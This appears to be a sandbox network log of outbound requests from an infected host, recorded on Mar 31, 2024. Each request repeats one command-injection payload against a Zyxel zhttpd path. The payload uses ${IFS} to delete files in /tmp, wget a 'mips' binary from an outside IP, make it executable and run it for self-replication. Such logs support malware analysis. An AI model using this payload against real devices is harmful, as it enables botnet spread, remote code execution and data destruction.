                              Mar 31, 2024 08:42:00.239165068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7740192.168.2.1335360204.60.81.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239212990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7741192.168.2.135623069.18.51.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239274979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7742192.168.2.1360714113.172.17.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239300966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7743192.168.2.1347912182.211.50.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239335060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7744192.168.2.134606675.141.250.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239363909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7745192.168.2.1350050167.133.9.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239394903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7746192.168.2.13603962.85.161.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239466906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7747192.168.2.134650475.161.8.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239490032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7748192.168.2.1334648198.160.122.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239506960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7749192.168.2.134308480.204.145.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239566088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7750192.168.2.1335230100.166.241.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239609957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7751192.168.2.1339880220.53.94.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239662886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7752192.168.2.136020478.105.119.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239684105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7753192.168.2.1352230198.180.120.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239706039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7754192.168.2.135707063.125.68.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239768028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7755192.168.2.1349524118.65.50.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239789963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7756192.168.2.1334224222.60.16.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239823103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7757192.168.2.134953218.254.38.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239876032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7758192.168.2.1344630161.206.117.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239919901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7759192.168.2.1349658223.232.141.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239967108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7760192.168.2.136009287.112.31.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.239984989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7761192.168.2.1343256193.204.99.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240044117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7762192.168.2.1359704162.231.111.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240048885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7763192.168.2.135827843.127.93.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240101099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7764192.168.2.133535268.169.237.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240127087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7765192.168.2.1351270176.200.109.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240164042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7766192.168.2.135819071.18.184.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240184069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7767192.168.2.133591694.229.192.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240242004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7768192.168.2.1335326169.211.131.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240281105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7769192.168.2.1337178124.200.104.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240309000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7770192.168.2.1360658190.188.42.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240340948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7771192.168.2.134125263.230.217.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240398884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7772192.168.2.135187493.118.70.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240418911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7773192.168.2.134176637.124.252.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240464926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7774192.168.2.1357998194.97.69.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240499020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7775192.168.2.134220878.189.107.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240540981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7776192.168.2.1355652145.57.204.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240575075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7777192.168.2.1356772147.151.50.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240602016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7778192.168.2.135703295.167.64.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240667105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7779192.168.2.1350424105.231.61.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240689993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7780192.168.2.1353152128.28.123.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240737915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7781192.168.2.1360858106.178.92.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240780115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7782192.168.2.1345540149.3.42.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240804911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7783192.168.2.133753081.167.25.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240847111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7784192.168.2.1352840159.193.99.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240869999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7785192.168.2.1333690104.6.9.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240906000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7786192.168.2.134187282.225.140.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240933895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7787192.168.2.1340912175.22.46.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.240991116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7788192.168.2.133916427.33.244.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241029024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7789192.168.2.135507619.193.215.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241071939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7790192.168.2.1341410207.10.155.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241110086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7791192.168.2.1337730217.246.61.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241134882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7792192.168.2.1340762118.85.19.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241183996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7793192.168.2.1347230170.198.56.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241206884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7794192.168.2.1335504184.193.43.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241230011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7795192.168.2.1341098125.115.112.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241286993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7796192.168.2.135598639.155.169.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241302967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7797192.168.2.1349186207.31.5.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241352081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7798192.168.2.1347168192.92.97.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241401911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7799192.168.2.1343008150.149.36.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241436005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7800192.168.2.1336960167.106.182.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241462946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7801192.168.2.13399328.47.125.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241509914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7802192.168.2.135262652.17.77.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241560936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7803192.168.2.1347224129.247.245.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241624117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7804192.168.2.1352946136.114.5.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241645098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7805192.168.2.1346212212.73.177.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241704941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7806192.168.2.1343704175.150.28.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241748095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7807192.168.2.1345776156.55.131.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:00.241769075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7808192.168.2.133787036.34.235.66443
                              TimestampBytes transferredDirectionData
